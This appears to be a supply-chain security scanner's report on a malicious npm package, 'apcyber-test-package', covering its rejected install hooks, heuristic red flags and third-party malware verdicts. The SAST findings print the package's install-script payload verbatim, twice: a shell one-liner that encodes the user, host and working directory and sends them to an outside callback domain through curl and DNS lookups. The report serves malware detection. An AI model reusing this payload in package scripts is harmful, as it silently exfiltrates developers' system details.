All apcyber-test-package versions
apcyber-test-package @99.99.99
Internal automation library.
Maintainers
Risk Dispositions (3 applicable to this version, 0 other)
Accepted rules are downgraded to INFO on future analyses; rejected rules escalate to CRITICAL.
| Rule | Source | Disposition | Author | Reason | |
|---|---|---|---|---|---|
install-script:preinstall |
install-scripts | reject | AI | AI (install-scripts): Exfiltrates host/user/env data to attacker-controlled domain; malicious by design. | |
install-script:install |
install-scripts | reject | AI | AI (install-scripts): Identical exfiltration payload in install script; malicious by design. | |
bogus-package |
bogus-package | reject | AI | AI (bogus-package): Empty shell package with no legitimate purpose; all signals consistent with a malware delivery vehicle. |
SAST Findings (5)
[Always reject] Script: b64=$(echo "$(whoami):$(hostname):$(pwd):$npm_package_name" | base64 -w0); pkgsub=$(echo "$npm_package_name" | sed 's/@//g; s///-/g'); pkgdns=$(echo "$npm_package_name" | base64 -w0 | tr '+/' '-_' | tr -d '='); curl -sm5 https://$pkgsub.callback.m0chan.co.uk/$b64; nslookup $pkgdns.$pkgsub.callback.m0chan.co.uk
[Always reject] Script: b64=$(echo "$(whoami):$(hostname):$(pwd):$npm_package_name" | base64 -w0); pkgsub=$(echo "$npm_package_name" | sed 's/@//g; s///-/g'); pkgdns=$(echo "$npm_package_name" | base64 -w0 | tr '+/' '-_' | tr -d '='); curl -sm5 https://$pkgsub.callback.m0chan.co.uk/$b64; nslookup $pkgdns.$pkgsub.callback.m0chan.co.uk
[Always reject] Matched 6 signal(s), weighted score 7: • [S_README_NO_CODE] Short README with no code block, no install instructions, and no usage/API section. • [S_NO_REPO_NO_HOME] No repository, homepage, or bugs URL — genuine packages almost always link somewhere. • [S_NO_KEYWORDS] No keywords declared. • [S_NO_DEPS] No runtime, dev, peer, or optional dependencies declared. • [S_TINY_PAYLOAD] Tiny payload: 1 code file(s), 957 bytes total. • [S_EMPTY_MAIN] Entry point (index.js) is 21 bytes — effectively empty.
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (4386e2b20fb74fe5b131a23550b9550b4539a3f79056ea8ad08f502453409737) The package apcyber-test-package was found to contain malicious code. ## Source: ossf-package-analysis (e6a50b18823ef5c1ec2bac66ebde8c45a5b1c0601c2a25f7d9a5ca2ee9de6a4e) The OpenSSF Package Analysis project identified 'apcyber-test-package' @ 99.99.99 (npm) as malicious. It is considered malicious because: - The package executes one or more commands associated with malicious behavior.
Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
Review Summary
Risk score: 100 (capped from 163). Findings: 4 critical (+160), 1 low (+3).
Published to npm: